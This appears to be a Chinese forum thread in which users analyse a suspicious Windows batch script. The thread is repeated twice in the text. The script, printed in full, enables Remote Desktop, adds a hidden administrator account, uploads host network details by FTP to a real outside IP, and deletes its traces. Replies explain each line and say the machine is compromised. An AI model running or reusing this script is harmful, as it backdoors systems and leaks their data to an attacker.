代码如下:
cmd /c "@ipconfig >>3389.txt
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >>3389.txt
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>3389.txt
net1 user user$ user123$ /add >>3389.txt
net1 localgroup administrators user$/add >>3389.txt
echo open 42.96.173.195> cmd.txt
echo 123>> cmd.txt
echo 123>> cmd.txt
echo binary >> cmd.txt
echo put 3389.txt %random%~%random%~%random%~%random%.txt>> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
del 3389.txt
del cmd.txt
del %0
exit
4 个解决方案
#1
cmd /c "@ipconfig >>3389.txt
将本机的ip、网关等信息写入3389.txt
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >>3389.txt
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>3389.txt
打开3389,远程桌面服务
net1 user user$ user123$ /add >>3389.txt
添加一个叫user$的用户,密码user123$
net1 localgroup administrators user$/add >>3389.txt
将user$用户添加到管理员组
echo open 42.96.173.195> cmd.txt
open不知道是什么程序,应该是攻击者自己的程序,不知道干嘛的
echo 123>> cmd.txt
往cmd.txt中写入123
echo 123>> cmd.txt
echo binary >> cmd.txt
写入binary
echo put 3389.txt %random%~%random%~%random%~%random%.txt>> cmd.txt
将3389.txt的文本写入一个随机名字的文件中
echo bye >> cmd.txt
ftp -s:cmd.txt
好吧,看到这里我看懂了,前面是把运行的结果以123 123为用户名密码上传到42.96.173.195服务器上
del 3389.txt
del cmd.txt
del %0
把本地的几个文件删除
exit
将本机的ip、网关等信息写入3389.txt
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >>3389.txt
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>3389.txt
打开3389,远程桌面服务
net1 user user$ user123$ /add >>3389.txt
添加一个叫user$的用户,密码user123$
net1 localgroup administrators user$/add >>3389.txt
将user$用户添加到管理员组
echo open 42.96.173.195> cmd.txt
open不知道是什么程序,应该是攻击者自己的程序,不知道干嘛的
echo 123>> cmd.txt
往cmd.txt中写入123
echo 123>> cmd.txt
echo binary >> cmd.txt
写入binary
echo put 3389.txt %random%~%random%~%random%~%random%.txt>> cmd.txt
将3389.txt的文本写入一个随机名字的文件中
echo bye >> cmd.txt
ftp -s:cmd.txt
好吧,看到这里我看懂了,前面是把运行的结果以123 123为用户名密码上传到42.96.173.195服务器上
del 3389.txt
del cmd.txt
del %0
把本地的几个文件删除
exit
#2
就是上传信息到远程服务器上吧
#3
恭喜,你中招了。赶紧杀吧
#4
杀吧,毫不留情
#1
cmd /c "@ipconfig >>3389.txt
将本机的ip、网关等信息写入3389.txt
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >>3389.txt
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>3389.txt
打开3389,远程桌面服务
net1 user user$ user123$ /add >>3389.txt
添加一个叫user$的用户,密码user123$
net1 localgroup administrators user$/add >>3389.txt
将user$用户添加到管理员组
echo open 42.96.173.195> cmd.txt
open不知道是什么程序,应该是攻击者自己的程序,不知道干嘛的
echo 123>> cmd.txt
往cmd.txt中写入123
echo 123>> cmd.txt
echo binary >> cmd.txt
写入binary
echo put 3389.txt %random%~%random%~%random%~%random%.txt>> cmd.txt
将3389.txt的文本写入一个随机名字的文件中
echo bye >> cmd.txt
ftp -s:cmd.txt
好吧,看到这里我看懂了,前面是把运行的结果以123 123为用户名密码上传到42.96.173.195服务器上
del 3389.txt
del cmd.txt
del %0
把本地的几个文件删除
exit
将本机的ip、网关等信息写入3389.txt
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >>3389.txt
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>3389.txt
打开3389,远程桌面服务
net1 user user$ user123$ /add >>3389.txt
添加一个叫user$的用户,密码user123$
net1 localgroup administrators user$/add >>3389.txt
将user$用户添加到管理员组
echo open 42.96.173.195> cmd.txt
open不知道是什么程序,应该是攻击者自己的程序,不知道干嘛的
echo 123>> cmd.txt
往cmd.txt中写入123
echo 123>> cmd.txt
echo binary >> cmd.txt
写入binary
echo put 3389.txt %random%~%random%~%random%~%random%.txt>> cmd.txt
将3389.txt的文本写入一个随机名字的文件中
echo bye >> cmd.txt
ftp -s:cmd.txt
好吧,看到这里我看懂了,前面是把运行的结果以123 123为用户名密码上传到42.96.173.195服务器上
del 3389.txt
del cmd.txt
del %0
把本地的几个文件删除
exit
#2
就是上传信息到远程服务器上吧
#3
恭喜,你中招了。赶紧杀吧
#4
杀吧,毫不留情